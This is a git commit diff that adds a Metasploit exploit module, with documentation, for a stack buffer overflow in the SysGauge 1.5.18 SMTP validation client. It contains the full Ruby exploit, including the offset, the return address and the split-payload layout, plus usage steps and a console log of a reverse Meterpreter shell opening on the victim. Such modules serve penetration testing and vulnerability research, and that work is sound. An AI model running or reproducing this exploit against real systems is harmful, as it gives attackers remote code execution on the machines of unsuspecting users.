Add sysgauge_client_bof module and documentation
parent
e96013cd0f
commit
cc4f18e6c5
|
@ -0,0 +1,39 @@
|
|||
## Vulnerable Application
|
||||
|
||||
This module will setup a SMTP server expecting a connection from SysGauge 1.5.18
|
||||
via its SMTP server validation. The module sends a malicious response along in the
|
||||
220 service ready response and exploits the client resulting in an unpriviledged shell.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Install the application
|
||||
2. Start msfconsole
|
||||
3. Do: ```use exploit/windows/smtp/sysgauge_client_bof```
|
||||
4. Do: ```set payload windows/meterpreter/reverse_tcp```
|
||||
5. Do: ```set LHOST ip```
|
||||
6. Do: ```run```
|
||||
7. The user should put your `SRVHOST` or other applicable IP address in the SMTP configuration
|
||||
in the program, and hit the "Verify Email ..." button.
|
||||
8. You should get a shell.
|
||||
|
||||
## Scenarios
|
||||
|
||||
Here is how to typically execute the module. Note that the client must input this SMTP server
|
||||
information under SysGauge Options and hit the "Verify Email ..." button.
|
||||
|
||||
```
|
||||
msf > use exploit/windows/smtp/sysgauge_client_bof
|
||||
msf exploit(sysgauge_client_bof) > set payload windows/meterpreter/reverse_tcp
|
||||
payload => windows/meterpreter/reverse_tcp
|
||||
msf exploit(sysgauge_client_bof) > set lhost 10.0.0.1
|
||||
lhost => 10.0.0.1
|
||||
msf exploit(sysgauge_client_bof) > exploit
|
||||
[*] Exploit running as background job.
|
||||
msf exploit(sysgauge_client_bof) >
|
||||
[*] Started reverse TCP handler on 10.0.0.1:4444
|
||||
[*] Server started.
|
||||
[*] Client connected: 10.0.0.128
|
||||
[*] Sending payload...
|
||||
[*] Sending stage (957487 bytes) to 10.0.0.128
|
||||
[*] Meterpreter session 1 opened (10.0.0.1:4444 -> 10.0.0.128:49165) at 2017-03-14 23:15:04 -0500
|
||||
```
|
|
@ -0,0 +1,87 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
#
|
||||
# Fuzzer written by corelanc0d3r - <peter.ve [at] corelan.be>
|
||||
# http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/
|
||||
#
|
||||
##
|
||||
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
include Msf::Exploit::Remote::TcpServer
|
||||
|
||||
def initialize()
|
||||
super(
|
||||
'Name' => 'SysGauge SMTP Validation Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module will setup a SMTP server expecting a connection from SysGauge 1.5.18
|
||||
via its SMTP server validation. The module sends a malicious response along in the
|
||||
220 service ready response and exploits the client resulting in an unpriviledged shell.
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
'Chris Higgins', # msf Module -- @ch1gg1ns
|
||||
'Peter Baris'
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
[ 'EDB', '41479' ],
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'thread'
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 306,
|
||||
'Smallest' => true,
|
||||
'BadChars' => "\x00\x0a\x0d\x20"
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Windows Universal',
|
||||
{
|
||||
'Offset' => 176,
|
||||
'Ret' => 0x6527635E # call esp # QtGui4.dll
|
||||
}
|
||||
]
|
||||
],
|
||||
'Privileged' => 'false',
|
||||
'DisclosureDate' => 'Feb 28 2017',
|
||||
'DefaultTarget' => 0
|
||||
)
|
||||
register_options(
|
||||
[
|
||||
OptPort.new('SRVPORT', [ true, "The local port to listen on.", 25 ]),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def setup
|
||||
super
|
||||
end
|
||||
|
||||
def on_client_connect(c)
|
||||
sploit = "220 "
|
||||
sploit += rand_text(target['Offset'])
|
||||
# Can only use the last part starting from 232 bytes in
|
||||
sploit += payload.encoded[232..-1]
|
||||
sploit += rand_text(2)
|
||||
sploit += [target.ret].pack('V')
|
||||
sploit += rand_text(12)
|
||||
sploit += make_nops(8)
|
||||
# And the first part up to 232 bytes
|
||||
sploit += payload.encoded[0..231]
|
||||
sploit += "ESMTP Sendmail \r\n"
|
||||
|
||||
print_status("Client connected: " + c.peerhost)
|
||||
print_status("Sending payload...")
|
||||
|
||||
c.put(sploit)
|
||||
end
|
||||
|
||||
end
|
Loading…
Reference in New Issue